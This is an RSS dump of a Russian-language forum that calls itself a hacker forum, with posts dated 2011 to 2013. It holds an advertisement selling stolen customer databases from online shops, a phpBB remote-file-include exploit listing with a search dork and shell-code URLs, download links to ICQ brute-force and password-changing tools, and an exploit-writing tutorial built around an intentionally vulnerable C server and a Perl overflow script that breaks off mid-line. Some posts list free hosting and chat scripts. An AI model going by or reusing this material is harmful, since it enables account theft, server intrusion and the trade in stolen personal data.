https://forumis.fludilka.su/ Хакерский форум ru-ru Fri, 20 Dec 2013 14:20:31 +0400 MyBB/mybb.ru https://forumis.fludilka.su/viewtopic.php?pid=30#p30 <p><img class="postimg" loading="lazy" src="https://motorodeo.org/img/attention.png" alt="http://motorodeo.org/img/attention.png" /><span style="color: Yellow"><strong>Внимание:</strong> </span><span style="color: White"> Наша команда предоставляет только подлинные базы данных клиентов интернет магазинов и прочих проектов. Никаких подделок и парсинга. Всегда легко проверить базу (нажав на сайте (забыл пароль)) Тест всегда предоставим бесплатно. Будьте бдительны покупая у других селлеров (гоняясь за дешевой ценой) часто продают бесплатные базы под видом крупных проектов. </span> </p> <p><span style="color: Yellow"><strong>[COLOR=Yellow]В наличие:</span></strong>[/COLOR]<br /><span style="color: DarkOrange">Новые базы за неделю:</span> 12<br /><span style="color: DarkOrange">Интернет Магазины одежды:</span> 11<br /><span style="color: DarkOrange">Forex базы:</span> 14<br /><span style="color: DarkOrange">Купонные сайты:</span> 8<br /><span style="color: DarkOrange">Юридические:</span> 9<br /><span style="color: DarkOrange">Директора Москвы</span> 4<br /><span style="color: DarkOrange">Арендаторы Москвы</span> 1<br /><span style="color: DarkOrange">Сервис email и смс рассылки </span> 4<br /><span style="color: DarkOrange">База Артистов и знаменитостей</span> 1<br /><span style="color: DarkOrange">Фитнес центр (клубные карты)</span> 1<br /><span style="color: DarkOrange">Новостные порталы</span> 1<br /><span style="color: DarkOrange">Проект Бизнес Молодость</span> 1<br /><span style="color: DarkOrange">Другое</span> 12</p> <p><strong><span style="color: Yellow">Персональный аттестат BL135</span></strong><br />--------------------<br /><span style="color: Yellow"><strong>[COLOR=Yellow]Контакты</span></strong>[/COLOR]<br />Mail: bazuemail@gmail.com<br />ICQ: 130930</p> <p><span style="color: Gray">Теги: база email ; базы email ; купить базу email ; база мобильных номеров ; купить базу мобильных номеров ; база сайта ; базы сайтов ; база данных сайтов ; база данных ; базы данных ; купить базы данных ; купить базу данных ; база групона ; база данных групона ; скачать база данных групона ; скачать базу email ; купить базу данных групона ; купить базу groupon ; купить базу biglion ; купить базу клиентов ; скачать базу клиентов ; база биглион ; купить базу биглион ; купить базу клиентов Москва ; база данных телефонов ; база данных москвы ; база данных онлайн ; база данных людей ; база данных сайта ; база данных купить ; база данных мобильных телефонов ; база телефонов ; продам базу данных ; базы данных access ; продажа базы данных ; скачать базу данных ; базы данных людей ; купить базу данных предприятий ; база данных жителей украины ; база данных жителей россии ; база данных сотовых телефонов ; база данных жителей москвы ; телефонная база москвы ; база данных москва ; база данных недвижимости москвы ; база данных предприятий ; база данных самара ; жители москвы база данных ; где купить базу данных ; скачать база данных ; купить базу интернет магазина одежды ; купить базу интернет магазина ; купить клиентов интернет магазина ; купить клиентов купонника ; купонный бизнес ; купить базу купонника ; купить базу данных сайта ; купить базу данных email ; купить базу емейл ; продажа интернет магазина ; интернет магазин купить ; цена интернет магазина ; программа рассылки писем ; заказать базу данных ; купонный бизнес ; куплю базу email ; куплю базу клиентов ; куплю базу емейлов ; база интернет магазина ; раскрутка интернет магазина<br /><br /><br /></p> <p></span></p> mybb@mybb.ru (Bazuemail) Fri, 20 Dec 2013 14:20:31 +0400 https://forumis.fludilka.su/viewtopic.php?pid=30#p30 https://forumis.fludilka.su/viewtopic.php?pid=29#p29 <p>Советую хостинг arvixe.ru <br /> Сам пользуюсь 7 месяцев, тарифы от 30 руб/мес, 1Гб, трафик 10 Гб, сайтов до 6, баз данных до12 (см. тарифный план), PHP 5, Perl, Python, Ruby on Rails, ImageMagick, NetPBM, GD, Zend Optimizer, всё необходимое для flash видео и др. Техподдержка отличная, сайт всегда доступен, сбой на сервере был 1 раз, в этом году поддерживают русские домены в зоне рф. Я доволен!</p> mybb@mybb.ru (~TwiGZeR~) Wed, 05 Oct 2011 17:49:47 +0400 https://forumis.fludilka.su/viewtopic.php?pid=29#p29 https://forumis.fludilka.su/viewtopic.php?pid=27#p27 <p>скоро будет</p> mybb@mybb.ru (administrator) Tue, 08 Mar 2011 23:19:59 +0300 https://forumis.fludilka.su/viewtopic.php?pid=27#p27 https://forumis.fludilka.su/viewtopic.php?pid=26#p26 <p>Вот решил напостить чужую статейку, а именно не статья, а список чатов, как бесплатных, так и нет. Вообщем смотрим'с и выбираем. </p> <p>O-Chat- Чат на перле от OLEX<br />В работе можно посмотреть на chat.evropa.com.ua <br />Установка, обсуждение и ранние версии O-Chat <br />Последняя версия доступная для скачивания лежит здесь <br />Версия 5.0 beta </p> <p>[http://www.internet-technologies.ru/scripts/script_95.html]Andys Chat 4.0[/url]<br />на PHP</p> <p>COSMO-CHAT v. 2.0<br />на PHP</p> <p>Pipeys Flash Chat<br />на APS<br />Чат на основе АСП - только на Флеше. Исходнике в зипе - можно слегка поменять дизайн, хотя сам дизайн очень приятный на глаз.</p> <p>ChatNetPro v6.0<br />на Perl'е<br />- Станица администратора;<br />- Создание комнат;<br />- Приватные комната;<br />- Приватные сообщения;<br />- Пользователи могут прогонять других со своих комнат;<br />- Поиск;<br />- Пересылка картинок;<br />- Личный профиль пользователя;<br />- Список участников для каждой комнаты;<br />- Выбор цветов и шрифтов пользователями;<br />- Специальные команды (/me /help);<br />- и т.д. </p> <p>KVCHat by KVCH<br />(Perl, MySQL) <br />(платный) </p> <p>JavaScript Lite Perl Chat <br />(Perl, JS)</p> <p>X7 Chat</p> <p>phpMyChat <br />обсуждение этого чата <br />(PHP)</p> <p>Чат на PHP/MySQL<br />Скачать чат, аддоны и посмотреть инфу к нему можно здесь:<br />SpxChatEngine <br />Demo: alphachat.ch </p> <p>ralfchat.sourceforge.net <br />(Perl, MySQL) <br />Переводы на русский язык:<br />Перевод 1 <br />Перевод 2</p> <p>GTChat <br />Oбсуждение чата и все проблемы с установкой<br />(Perl без MySQL)</p> <p>Чат бородина<br />Интересная и мощная реализация чата<br />Оффициальный сайт<br />Demo <br />(PHP, free) </p> <p>chat.glasnet.ru<br />(PHP, MySQL)</p> <p>Clatter<br />Demo<br />(PHP) <br /></p> <p>DukChat<br />(PHP, MySQL) <br />(платный и бесплатный) </p> <p>Voodoo chat<br />Установка и обсуждение Voodoo chat </p> <p>PHPOpenChat<br />(PHP, MySQL) </p> <p>MWChat<br />Demo<br />(PHP, MySQL) </p> <p>DigiChat<br />(Java) <br />(платный)</p> <p>Chat#One<br />(нужна регистрация) </p> <p>Gorilla Gab<br />Немного функций, но очень прост в настройке <br />(PHP)</p> <p>Monstar chatbox<br />(PHP)</p> <p>MonoChat<br />(PHP, MySQL) </p> <p>MLChat<br />(PHP)</p> <p>med-chat<br />(PHP, MySQL) </p> <p>Nomia Easy Chat<br />Простой чат на Perl + файлы <br />Посмотреть в работе<br />Скачать последнюю версию <br />Обсудить <br />Версия 0.5 <br /><br /></p> <p>&lt;!-- бесплатные на C\C++ --&gt; <br /><a href="http://www.adevas.com/Chat.html" rel="nofollow" target="_blank">http://www.adevas.com/Chat.html</a> <br /><a href="http://www.integritymessenger.com/" rel="nofollow" target="_blank">http://www.integritymessenger.com/</a> <br /><a href="http://sourceforge.net/projects/yacca/" rel="nofollow" target="_blank">http://sourceforge.net/projects/yacca/</a></p> <p>&lt;!-- Коллекции чатов на PHP: --&gt; <br /><a href="http://carline.ru/programm/index.php?action=viewcat&amp;id=96" rel="nofollow" target="_blank">http://carline.ru/programm/index.php?ac &#8230; &amp;id=96</a> (3 бесплатных чата) <br /><a href="http://www.hotscripts.com/PHP/Scripts_and_Programs/Chat_Scripts/" rel="nofollow" target="_blank">http://www.hotscripts.com/PHP/Scripts_a &#8230; t_Scripts/</a> <br /><a href="http://php.resourceindex.com/Complete_Scripts/Chat/" rel="nofollow" target="_blank">http://php.resourceindex.com/Complete_Scripts/Chat/</a></p> <p>&lt;!-- Колллекции чатов на Perl: --&gt; <br /><a href="http://cgi.myweb.ru/catalog.phtml?ca_id=19&amp;cp_level=2&amp;lang=" rel="nofollow" target="_blank">http://cgi.myweb.ru/catalog.phtml?ca_id &#8230; &amp;lang=</a> <br /><a href="http://cgi.resourceindex.com/Programs_and_Scripts/Perl/Chat/" rel="nofollow" target="_blank">http://cgi.resourceindex.com/Programs_a &#8230; Perl/Chat/</a><br />Если ссылки битые, то постите тут, будем исправлять положение.</p> mybb@mybb.ru (administrator) Tue, 08 Mar 2011 23:13:54 +0300 https://forumis.fludilka.su/viewtopic.php?pid=26#p26 https://forumis.fludilka.su/viewtopic.php?pid=25#p25 <p><strong>phpBB 3.0.7</strong></p><div class="quote-box quote-main"><blockquote><p>##################################################&#160; ####################<br />#<br /># PHPBB Version 3.0.7 Remote File Include !<br />#<br /># Author : D.0.M TEAM<br />#<br /># Founded By : S3Ri0uS !<br />#<br /># We Are : Inj3ct0r.com Exploit and Vulnerability Database.<br />#<br /># Public Site : WwWAnti-Secure.CoM !<br />#<br /># Security Site : WwWD0M-Security.CoM !<br />#<br /># Contact 1 : S3Ri0uS.Blackhat@Gmail.CoM !<br />#<br /># Contact 2 : S3Ri0uS_Blackhat@Yahoo.CoM !<br />#<br /># SpT : All Iranian Hackers !<br />#<br />##################################################&#160; ####################<br />#<br /># Dork :<br />#<br /># inurl:&amp;quot;powered by PHPBB Version 3.0.7&amp;quot;<br />#<br /># Exploit :<br />#<br /># <a href="http://www.site.com/path/common.php?phpbb_root_path=" rel="nofollow" target="_blank">http://www.site.com/path/common.php?phpbb_root_path=</a>[shell code]<br />#<br /># <a href="http://www.site.com/path/cron.php?phpbb_root_path=" rel="nofollow" target="_blank">http://www.site.com/path/cron.php?phpbb_root_path=</a>[shell code]<br />#<br /># <a href="http://www.site.com/path/faq.php?phpbb_root_path=" rel="nofollow" target="_blank">http://www.site.com/path/faq.php?phpbb_root_path=</a>[shell code]<br />#<br /># <a href="http://www.site.com/path/feed.php?phpbb_root_path=" rel="nofollow" target="_blank">http://www.site.com/path/feed.php?phpbb_root_path=</a>[shell code]<br />#<br /># <a href="http://www.site.com/path/index.php?phpbb_root_path=" rel="nofollow" target="_blank">http://www.site.com/path/index.php?phpbb_root_path=</a>[shell code]<br />#<br /># <a href="http://www.site.com/path/mcp.php?phpbb_root_path=" rel="nofollow" target="_blank">http://www.site.com/path/mcp.php?phpbb_root_path=</a>[shell code]<br />#<br /># <a href="http://www.site.com/path/memberlist.php?phpbb_root_path=" rel="nofollow" target="_blank">http://www.site.com/path/memberlist.php &#8230; root_path=</a>[shell code]<br />#<br /># <a href="http://www.site.com/path/posting.php?phpbb_root_path=" rel="nofollow" target="_blank">http://www.site.com/path/posting.php?phpbb_root_path=</a>[shell code]<br />#<br /># <a href="http://www.site.com/path/report.php?phpbb_root_path=" rel="nofollow" target="_blank">http://www.site.com/path/report.php?phpbb_root_path=</a>[shell code]<br />#<br /># <a href="http://www.site.com/path/search.php?phpbb_root_path=" rel="nofollow" target="_blank">http://www.site.com/path/search.php?phpbb_root_path=</a>[shell code]<br />#<br /># <a href="http://www.site.com/path/style.php?phpbb_root_path=" rel="nofollow" target="_blank">http://www.site.com/path/style.php?phpbb_root_path=</a>[shell code]<br />#<br /># <a href="http://www.site.com/path/ucp.php?phpbb_root_path=" rel="nofollow" target="_blank">http://www.site.com/path/ucp.php?phpbb_root_path=</a>[shell code]<br />#<br /># <a href="http://www.site.com/path/viewforum.php?phpbb_root_path=" rel="nofollow" target="_blank">http://www.site.com/path/viewforum.php?phpbb_root_path=</a>[shell code]<br />#<br /># <a href="http://www.site.com/path/adm/index.php?phpbb_root_path=" rel="nofollow" target="_blank">http://www.site.com/path/adm/index.php?phpbb_root_path=</a>[shell code]<br />#<br /># <a href="http://www.site.com/path/adm/swatch.php?phpbb_root_path=" rel="nofollow" target="_blank">http://www.site.com/path/adm/swatch.php &#8230; root_path=</a>[shell code]<br />#<br /># <a href="http://www.site.com/path/download/file.php?phpbb_root_path=" rel="nofollow" target="_blank">http://www.site.com/path/download/file. &#8230; root_path=</a>[shell code]<br />#<br /># <a href="http://www.site.com/path/includes/auth.php?phpbb_root_path=" rel="nofollow" target="_blank">http://www.site.com/path/includes/auth. &#8230; root_path=</a>[shell code]<br />#<br /># <a href="http://www.site.com/path/includes/functions.php?phpbb_root_path=" rel="nofollow" target="_blank">http://www.site.com/path/includes/funct &#8230; root_path=</a>[shell code]<br />#<br /># <a href="http://www.site.com/path/includes/functions_content.php?phpbb_root_path=" rel="nofollow" target="_blank">http://www.site.com/path/includes/funct &#8230; root_path=</a>[shell code]<br />#<br /># <a href="http://www.site.com/path/includes/session.php?phpbb_root_path=" rel="nofollow" target="_blank">http://www.site.com/path/includes/sessi &#8230; root_path=</a>[shell code]<br />#<br /># <a href="http://www.site.com/path/includes/template.php?phpbb_root_path=" rel="nofollow" target="_blank">http://www.site.com/path/includes/templ &#8230; root_path=</a>[shell code]<br />#<br /># <a href="http://www.site.com/path/includes/acm/acm_file.php?phpbb_root_path=" rel="nofollow" target="_blank">http://www.site.com/path/includes/acm/a &#8230; root_path=</a>[shell code]<br />#<br /># <a href="http://www.site.com/path/includes/acp/acp_attachments.php?phpbb_root_path=" rel="nofollow" target="_blank">http://www.site.com/path/includes/acp/a &#8230; root_path=</a>[shell code]<br />#<br /># <a href="http://www.site.com/path/includes/utf/utf_tools.php?phpbb_root_path=" rel="nofollow" target="_blank">http://www.site.com/path/includes/utf/u &#8230; root_path=</a>[shell code]<br />#<br /># <a href="http://www.site.com/path/includes/ucp/ucp_register.php?phpbb_root_path=" rel="nofollow" target="_blank">http://www.site.com/path/includes/ucp/u &#8230; root_path=</a>[shell code]<br />#<br /># <a href="http://www.site.com/path/includes/ucp/ucp_pm_viewmessage.php?phpbb_root_path=" rel="nofollow" target="_blank">http://www.site.com/path/includes/ucp/u &#8230; root_path=</a>[shell code]<br />#<br />##################################################&#160; ####################</p></blockquote></div> mybb@mybb.ru (administrator) Tue, 08 Mar 2011 23:11:59 +0300 https://forumis.fludilka.su/viewtopic.php?pid=25#p25 https://forumis.fludilka.su/viewtopic.php?pid=17#p17 <p>Джентльменский набор Web-разработчика, набор дистрибутивов (Apache, PHP, MySQL, Perl и т.д.) и программная оболочка, используемые Web-разработчиками для разработки сайтов на «домашней» (локальной) Windows-машине без необходимости выхода в Интернет. Главная особенность Денвера — удобство при удаленной работе сразу над несколькими независимыми проектами и возможность размещения на Flash-накопителе.<br />Состав базового пакета (PHP 5.3.1, MySQL 5.1, PostgreSQL 8.4 etc.)<br />Скачать:<br /><a href="http://www.denwer.ru/" rel="nofollow" target="_blank">http://www.denwer.ru/</a></p> mybb@mybb.ru (administrator) Tue, 08 Mar 2011 10:40:36 +0300 https://forumis.fludilka.su/viewtopic.php?pid=17#p17 https://forumis.fludilka.su/viewtopic.php?pid=16#p16 <p>Предлагаю в этой теме выкладывать адреса бесплатных хостингов и их краткое описание.<br />Оформление как в первом посту.</p> <p>&quot;Яндекс.Народ&quot; - хостинг и хранение файлов<br />Возможность бесплатно создать сайт, настроить его внешний вид или создать собственный дизайн; загружать и хранить файлы, обмениваться ими.<br />narod.yandex.ru </p> <p>&quot;UcoZ&quot; - бесплатный хостинг и конструктор сайтов <br />Система управления сайтом с набором сервисов (гостевые книги, форумы, каталоги, голосования и т.д.). Возможность настройки шаблонов, FTP-доступ и др.<br />wwwucoz.ru </p> <p>&quot;Holm.ru&quot; - бесплатный веб-хостинг<br />Описание предоставляемых сервисов (в т.ч запуск cgi скриптов, доступ к БД MySQL, ftp-доступ к виртуальному серверу). Онлайн-регистрация. FAQ<br />wwwholm.ru </p> <p>&quot;Россия православная&quot; - бесплатный хостинг <br />Бесплатный хостинг православных сайтов. Условия. Список веб-сервисов. Домены, характеристики сервера. Список размещенных сайтов.<br />wwworthodoxy.ru </p> <p>&quot;Fatal.ru&quot; - бесплатный хостинг<br />Бесплатное размещении веб-сайтов с использованием своих CGI-скриптов на Perl, PHP, C/C++. (Вроде как требуется инвайт)<br />wwwfatal.ru <br />&quot;SiteCity&quot; - разработка и хостинг веб-страниц <br />Возможность бесплатного автоматического создания домашней страницы по типовому шаблону и размещение ее в интернете. Каталог сайтов участников.<br />wwwsitecity.ru </p> <p>&quot;Virtual avenue&quot; - служба хостинга <br />Бесплатные услуги хостинга. Поиск по сайтам сервера. Каталог информации и устройств, полезных при организации бизнеса в сети. На англ. яз.<br />wwwvirtualave.net </p> <p>Hobby.Ru - проект компании &quot;Zenon Н.С.П.&quot; <br />Бесплатный хостинг для авторов интересных страниц. Рейтинги участников. Архив новостей сервера HOBBY.RU . Правила участия в проекте.<br />wwwhobby.ru </p> <p>&quot;FortuneCity&quot; - бесплатный хостинг веб-страниц <br />Предоставляется 100 Мб веб-пространства и средства разработки сайтов и блогов. На англ. яз.<br />wwwfortunecity.com </p> <p>&quot;Mylivepage&quot; - бесплатный хостинг <br />Социальная сеть построенная на основе конструктора сайтов. Возможность создавать блоги, хранить файлы и картинки.<br />wwwmylivepage.ru</p> <p>000webhost.com<br />Свободное место 1500MB<br />траффик 100Gb\месяц<br />Поддержка PHP Cron Web Mail <br />MySQL DB 2<br />Sub-domains 5<br />E-mail 5<br />Бэкап есть</p> <p><a href="http://byethost.com" rel="nofollow" target="_blank">http://byethost.com</a><br />Свободное место 5500 MB<br />траффик 200 Gb\месяц<br />Поддержка PHP Cron Web Mail <br />MySQL DB 50<br />Sub-domains 50 <br />E-mail 5<br />Примечание: очень удобная админка. Советую.</p> <p><a href="http://www.free-web-host.me/" rel="nofollow" target="_blank">http://www.free-web-host.me/</a><br />Свободное место 3000 MB<br />траффик Неограниченно<br />Поддержка PHP Perl Cron FrontPage Web Mail POP3 Server IMAP Support SMTP Server Custom Error Pages AWStats (Real Time Stats) <br />MySQL DB Неограниченно<br />Sub-domains Неограниченно <br />E-mail 10<br />Примечание: советую этот хостинг.</p> <p>WALLST.RU<br />Свободное место 100 MB<br />траффик Неограниченно<br />Поддержка PHP MySql </p> <p>&quot;Школьные страницы&quot; - хостинг для школ и гимназий <br />Web-страницы московских школ, гимназий, центров детского творчества. Бесплатное размещение страниц для образовательных учреждений.<br />schools.keldysh.ru</p> <p>&quot;Okis.ru&quot; - система создания сайтов <br />Возможность создавать сайты в визуальном редакторе на основе готовых шаблонов с бесплатным предоставлением хостинга и электронной почты, модулем интернет-магазина и т.д. Правила. Форум поддержки.<br />wwwokis.ru </p> <p>&quot;Hostland.su&quot; - бесплатный хостинг<br />Хостинг с PHP, Perl, MySQL. Форум поддержки пользователей.<br />wwwhostland.su </p> <p>&quot;Tut&quot; - бесплатный хостинг веб-страниц <br />Перечень услуг: бесплатная регистрация домена третьего уровня, хостинг веб-страниц.<br />wwwtut.ru</p> <p>&quot;ZeroCatch&quot; - услуги хостинга <br />Возможность бесплатно разместить свой веб-сайт размером до 250 Mb.<br />www0catch.com</p> <p>&quot;Na.by&quot; - белорусский хостинг<br />Услуги бесплатного хостинга с PHP, MySQL и др. сервисами. Условия сотрудничества.<br />wwwna.by </p> <p>&quot;Eclub.lv&quot; - бесплатный хостинг в Латвии <br />Правила размещения и регистрации сайта. Список сайтов. Форум.<br />wwweclub.lv </p> <p>&quot;My.ElVisti.com&quot; - бесплатный хостинг <br />Возможность бесплатного размещения Web-страницы. Правила регистрации. Условия использования. Технические вопросы. Алфавитный указатель размещенных страниц.<br />my.elvisti.com </p> <p>&quot;Hercules&quot; - бесплатный хостинг<br />Возможность бесплатно разместить веб-сайт (есть поддержка PHP и MySQL).<br />host.net.kg</p> <p>&quot;Интернет-Белогорье&quot; - региональная сеть <br />Хостинг интернет-страниц для образовательных учреждений Белгорода и области.<br />[forbidden link] </p> <p>&quot;MiraHost&quot; - бесплатный хостинг <br />Поддержка MySQL, PHP и Perl, доменов 2 уровня. Условия предоставления услуг. Онлайн-заказ. Форум поддержки.<br />wwwmirahost.ru </p> <p>Сервер домашних страниц Великого Новгорода <br />Бесплатный хостинг для домашних страниц. Правила регистрации. Список страниц пользователей.<br />home.novgorod.ru </p> <p>&quot;Page.by&quot;- бесплатный хостинг белорусских проектов<br />wwwpage.by </p> <p>&quot;Крастелекомсервис&quot; - хостинг веб-страниц <br />Бесплатный хостинг. Информация для пользователей, правила регистрации. Каталог сайтов, размещенных на сервере, с комментариями авторов.<br />home.kts.ru </p> <p>&quot;ИнтернетХост&quot; - услуги хостинга <br />Платный хостинг c PHP и MySQL, регистрация доменов, бесплатный хостинг для существующих доменов, услуги по созданию и поддержке сайтов.<br />internethost.ru </p> <p>&quot;ОсликUa&quot; - бесплатный хостинг <br />Онлайн-заказ пакета услуг. Информация о дополнительных услугах. Статьи по поисковой оптимизации сайтов.<br />site.oslikua.com </p> <p>&quot;Pesni.ru&quot; - бесплатный хостинг для музыкантов <br />Неограниченное место под официальные сайты музыкальным группам, авторам и исполнителям песен на сервере Песни.ру.<br />wwwpesni.ru/hosting.shtml </p> <p>Хостинг для некоммерческих организаций <br />Некоммерческий проект. Предлагаются услуги хостинга для экологических и некоммерческих организаций и проектов. Информация об условиях сотрудничества, регистрация, демонстрация хостинга.<br />wwwenviron.ru </p> <p>&quot;Колобок&quot; - размещение домашних страниц <br />Хостинг домашних веб-страниц. Онлайновая веб-мастерская, ссылки.<br />wwwkolobok.ru/home </p> <p>tut.su</p> <p>Бесплатная регистрация домена 3 уровня + домена 2 уровня (при опр. условиях)<br />Поддержка php<br />MySql<br />Дисковое пространство в 100 Mb + возможность увеличить</p> <p>Freehostia.Com<br />Бесплатный тариф &quot;Chocolate&quot;<br />Поддержка PHP, MySQL<br />250 MB дискового пространства<br />Возможность создания трех POP3/IMAP почтовых ящика<br />Возможность привязки собственного домена<br />wwwfreehostia.com</p> mybb@mybb.ru (administrator) Tue, 08 Mar 2011 10:38:07 +0300 https://forumis.fludilka.su/viewtopic.php?pid=16#p16 https://forumis.fludilka.su/viewtopic.php?pid=12#p12 <p><img class="postimg" loading="lazy" src="https://savepic.org/1343069.jpg" alt="http://savepic.org/1343069.jpg" /><br />Простой Авторегер Яндекс мыл. </p> <p>Автор: BuHT73<br /><a href="http://upwap.ru/1320973" rel="nofollow" target="_blank">http://upwap.ru/1320973</a></p> <p><strong>Пароль: 228</strong></p> mybb@mybb.ru (administrator) Tue, 08 Mar 2011 00:03:42 +0300 https://forumis.fludilka.su/viewtopic.php?pid=12#p12 https://forumis.fludilka.su/viewtopic.php?pid=11#p11 <p><span style="font-size: 14px">Базы номеров для брута.</span></p> <p><strong>Тут выкладываем базы для брута у кого что есть в зависимости от актуальности и пользы<br />Флуд будет караться а активность соответственно поощратся</strong></p> <p>Хороший сайтик с базам 6,7,8,9*<br /><a href="http://file.alice2k.name/" rel="nofollow" target="_blank">http://file.alice2k.name/</a><br />Тут есть Базы ICQ,Даты Реги,Города,Nick Names.</p> mybb@mybb.ru (administrator) Mon, 07 Mar 2011 23:55:42 +0300 https://forumis.fludilka.su/viewtopic.php?pid=11#p11 https://forumis.fludilka.su/viewtopic.php?pid=10#p10 <p><img class="postimg" loading="lazy" src="https://ubrute.com/images/ubrute_1.5_release_2.png" alt="http://ubrute.com/images/ubrute_1.5_release_2.png" /><br /><img class="postimg" loading="lazy" src="https://ubrute.com/images/ubrute_1.5_release_3.png" alt="http://ubrute.com/images/ubrute_1.5_release_3.png" /><br />Представляю новую версию UBrute. В ней было убрано много нерабочего и не юзаемого функционала. Было решено убрать встроенный сменщик, подробную стату по потокам и прокси, график а также редактор листов. Взамен был добавлен новый функционал:<br />ICQ бот.<br />Автообновление прокса по ссылке.<br />Брут через MD5 авторизацию.<br />Команды бота:</p> <p>Новый функционал практически не тестился так, что в случае каких то фатальных багов описывайте в теме по возможности всё будет исправлено.</p> <p>Скачать:<br /><a href="http://slil.ru/29581863" rel="nofollow" target="_blank">slil.ru</a></p> mybb@mybb.ru (administrator) Mon, 07 Mar 2011 23:54:46 +0300 https://forumis.fludilka.su/viewtopic.php?pid=10#p10 https://forumis.fludilka.su/viewtopic.php?pid=9#p9 <p><img class="postimg" loading="lazy" src="https://img248.imageshack.us/img248/3235/77718303.png" alt="http://img248.imageshack.us/img248/3235/77718303.png" /><br />Очередная версия сменщика паролей для ICQ. На этот раз он имеет относительно неплохую скорость (порядка 8-10 паролей в минуту) и возможность смены паролей у инвизов. Из недостатков невозможность поменять пароли у номеров с короткими паролями (короче 4 символов). Интерфейс аналогичен версии 1.2.</p> <p><span style="color: red">Скачать:</span><br /><a href="http://www.sendspace.com/file/jky8q9" rel="nofollow" target="_blank">http://www.sendspace.com/file/jky8q9</a></p> mybb@mybb.ru (administrator) Mon, 07 Mar 2011 23:54:08 +0300 https://forumis.fludilka.su/viewtopic.php?pid=9#p9 https://forumis.fludilka.su/viewtopic.php?pid=8#p8 <p>Откуда берутся сплоиты? Задумывался ли ты, каким образом тусклая новость из багтрака превращается в реально работающую отмычку? Каким образом двумя десяткам строчек кода удается получить шелл на удаленном сервере? Сегодня мы посетим фабрику сплоитов и во всех подробностях посмотрим, как изготавливается качественное изделие.</p> <p>Сплоит – что же это за зверь такой диковинный? По сути, это программа, написанная с целью использования уязвимости – в ОС, обычной программе или веб-приложении. Он может представлять из себя что угодно – программку на С/С++ (Delphi, Asm), скриптик на Perl или PHP, или даже находиться внутри картинки, но главное, что он влияет на уязвимую систему и заставляет ее работать так, как она не запрограммирована. Удаленный эксплоит работает через сеть и использует уязвимость без какого-либо предварительного доступа к уязвимой системе. Локальные же сплоиты запускаются непосредственно в уязвимой системе, требуя предварительного доступа к ней и обычно используются для повышения привилегий. </p> <p>Сплоиты можно разделить по типу используемой уязвимости: переполнение буфера, SQL-инъекция, межсайтовый скриптинг и т.д. Короче говоря, разновидностей бывает много и каждая из них отличается как техникой исполнения, так и своей целью. Но есть в них одно общее – все они содержат код, выполняющий задуманные хакером действия. Этот код называют: байт-код, шелл-код (так как очень часто этот код предоставляет доступ к шеллу на удаленной системе), полезной (боевой) нагрузкой (payload). Написание такого кода – целое искусство. Если хочешь разобраться в этой области, советую начать со статьи Step'а &quot;Откуда берутся шеллкоды&quot;. Мы же рассмотрим процесс написания эксплоита, а шелл-код возьмем уже готовый из пакета Metasploit.</p> <p><span style="color: red"><strong>Пишем жертву для экспериментов</strong></span></p> <p>Убежден, что нет более наглядного способа продемонстрировать создание боевого кода, чем на конкретном примере. Поэтому начнем с игры в горе-программистов и наваяем небольшое серверное приложение, оставив в нем критическую уязвимость, которую и будет эксплуатировать. Приложение будет принимать подключения на определенном порту: как только придет некоторый пакет, будет вызываться функция, выполняющая некоторые действия с полученными данными, после чего приложение завершается. Скелет приложения приведен ниже:</p> <p>void pr( char *str)</p> <p>{</p> <p>char buf[500]=&quot;&quot;;</p> <p>strcpy(buf,str); // вот и сама уязвимость, собственной персоной</p> <p>}<br /></p> <p>int main(int argc, char **argv)</p> <p>{</p> <p>....................</p> <p>int bytesRecv = SOCKET_ERROR;</p> <p>while( bytesRecv == SOCKET_ERROR )</p> <p>{</p> <p>//Получаем данные, отправленные клиентом</p> <p>bytesRecv = recv( clientSocket, Message, 5000, 0 );<br /></p> <p>if ( bytesRecv == 0 || bytesRecv == WSAECONNRESET )</p> <p>{</p> <p>printf( &quot;\nConnection Closed.\n&quot;);</p> <p>break;</p> <p>}</p> <p>}<br /></p> <p>pr(Message); // вызываем функцию, которая не проверяет длину входного буфера при <br />копировании<br /></p> <p>closesocket(clientSocket);</p> <p>closesocket(serverSocket);</p> <p>WSACleanup();</p> <p>return 0;</p> <p>}</p> <p>Внимательно взглянув на код, можно увидеть, что функция void pr(char *str) не проверяет длину входного буфера и, если передать ей в качестве параметра строку длиной более 500 символов - получится классическое переполнение буфера. Совсем кратко о том, как это работает (тут придется вспомнить, как работает стек):</p> <p>PUSH EDI // кладем в стек указатель, на буфер, который будем копировать <br />(*str)</p> <p>CALL Server._pr // вызываем функцию pf</p> <p>После вызова CALL стек будет выглядеть следующим образом:</p> <p>....<br />buf - локальная переменная, куда будем копировать входящие данные<br />ebp - сохраненный указатель кадра стека<br />ret - адрес возврата<br />*str - указатель на входящий буфер<br />....</p> <p>Под переменную buf у нас выделено 500 байт. А что будет, если скопировать туда строку длиннее?</p> <p>[buf][EBP][ret][*str]</p> <p>[AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]</p> <p>Как видишь, такая строка затрет EBP, адрес возврата и все, что расположено ниже по стеку – перезапиши адрес возврата нужным нам значением и тогда при выходе из функции мы можем вернуться, куда захотим, например, на наш шелл-код.</p> <p>Правда, стоит сделать поправку: уязвимости может и не быть. В смысле, от такой критической ошибки, конечно, никуда не деться, и программа в любом случае будет падать, однако использовать переполнение в сплоите может и не получиться. Виной тому стековые куки – специальная защита, включаемая в бинарник компилятором во время сборки приложения. Существует несколько способов обхода такой защиты (подробнее – смотри ниже), но сейчас для простоты примера предположим, что стековые кукисы отключены. Поэтому либо отключаем поддержку кукисов во время компиляции в Visual Studio, либо используем компилятор, который вообще не умеет встраивать подобную защиту. Второй вариант, как мне кажется, проще – так как можно использовать бесплатный компилятор lccwin32. Компилируем и запускаем.</p> <p><span style="color: red"><strong>Убить наповал!</strong></span></p> <p>Сервер работает ровно до тех пор, пока ему не придет строка, состоящая более чем из 500 символов. В противном случае – непременно вылет приложения. Набросаем небольшой скриптик на Perl'е для эксплуатации переполнения буфера:</p> <p>use strict;</p> <p>use Socket;</p> <p>my $junk = &quot;\x41&quot; x1000;<br /></p> <p># адрес и порт узявимого демона</p> <p>my $host = shift || 'localhost';</p> <p>my $port = shift || 200;</p> <p>my $proto = getprotobyname('tcp');<br /></p> <p># осуществляем привязки</p> <p>my $iaddr = inet_aton($host);</p> <p>my $paddr = sockaddr_in($port, $iaddr);<br /></p> <p>print &quot;[+] Setting up socket\n&quot;;</p> <p># создаем сокет и присоединяемся к порту</p> <p>socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die &quot;socket: $!&quot;;</p> <p>print 